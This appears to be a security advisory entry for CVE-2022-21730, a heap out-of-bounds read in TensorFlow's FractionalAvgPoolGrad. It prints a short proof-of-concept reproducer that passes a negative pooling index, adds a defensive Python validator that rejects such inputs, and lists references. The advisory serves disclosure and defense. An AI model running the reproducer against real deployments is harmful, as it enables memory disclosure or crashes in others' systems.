CVE-2022-21730: Out of bounds read in Tensorflow
The implementation of FractionalAvgPoolGrad does not validate its input tensors (for example, a negative index in row_pooling_sequence), allowing an attacker to read outside the bounds of the heap. The following reproducer from the advisory triggers the out-of-bounds read:
```python
import tensorflow as tf

@tf.function
def test():
    y = tf.raw_ops.FractionalAvgPoolGrad(
        orig_input_tensor_shape=[2, 2, 2, 2],
        out_backprop=[[[[1, 2], [3, 4], [5, 6]], [[7, 8], [9, 10], [11, 12]]]],
        row_pooling_sequence=[-10, 1, 2, 3],
        col_pooling_sequence=[1, 2, 3, 4],
        overlapping=True)
    return y

test()
```
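As an added example (not TensorFlow's own code and not the checks in the fix commit), the following pure-Python pre-flight validator rejects inconsistent FractionalAvgPoolGrad inputs such as the reproducer above before they reach the kernel; it runs without TensorFlow installed. The contract it enforces is an assumption: each pooling sequence must have one more entry than the matching out_backprop dimension, be non-decreasing, and stay within [0, input dimension].

```python
# Added example, not TensorFlow's own code. The constraints below are an assumed
# input contract for tf.raw_ops.FractionalAvgPoolGrad, not the fix commit's checks.

def _shape(tensor):
    """Infer the shape of a nested Python list, rejecting ragged nesting."""
    dims, node = [], tensor
    while isinstance(node, list):
        dims.append(len(node))
        node = node[0] if node else None

    def _conforms(n, d):
        if not d:
            return not isinstance(n, list)
        return isinstance(n, list) and len(n) == d[0] and all(_conforms(c, d[1:]) for c in n)

    if not _conforms(tensor, dims):
        raise ValueError("ragged tensor")
    return dims


def validate_fractional_avg_pool_grad_inputs(orig_input_tensor_shape, out_backprop,
                                             row_pooling_sequence, col_pooling_sequence):
    """Return the list of violated constraints; an empty list means the inputs are consistent."""
    errors = []
    if len(orig_input_tensor_shape) != 4:
        return ["orig_input_tensor_shape must have 4 elements"]
    batch, in_rows, in_cols, depth = orig_input_tensor_shape
    out_shape = _shape(out_backprop)
    if len(out_shape) != 4:
        return ["out_backprop must be 4-D"]
    out_batch, out_rows, out_cols, out_depth = out_shape
    if out_batch != batch:
        errors.append(f"batch mismatch: out_backprop {out_batch} vs input {batch}")
    if out_depth != depth:
        errors.append(f"depth mismatch: out_backprop {out_depth} vs input {depth}")
    for name, seq, limit, out_len in (
            ("row_pooling_sequence", row_pooling_sequence, in_rows, out_rows),
            ("col_pooling_sequence", col_pooling_sequence, in_cols, out_cols)):
        if len(seq) != out_len + 1:
            errors.append(f"{name} has {len(seq)} entries, expected {out_len + 1}")
        if any(v < 0 for v in seq):  # the -10 in the advisory's reproducer lands here
            errors.append(f"{name} contains a negative index")
        if any(b < a for a, b in zip(seq, seq[1:])):
            errors.append(f"{name} is not non-decreasing")
        if seq and seq[-1] > limit:
            errors.append(f"{name} ends at {seq[-1]}, beyond the input size {limit}")
    return errors
```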
References
- github.com/advisories/GHSA-vjg4-v33c-ggc4
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-54.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-109.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/fractional_avg_pool_op.cc
- github.com/tensorflow/tensorflow/commit/002408c3696b173863228223d535f9de72a101a9
- github.com/tensorflow/tensorflow/security/advisories/GHSA-vjg4-v33c-ggc4
- nvd.nist.gov/vuln/detail/CVE-2022-21730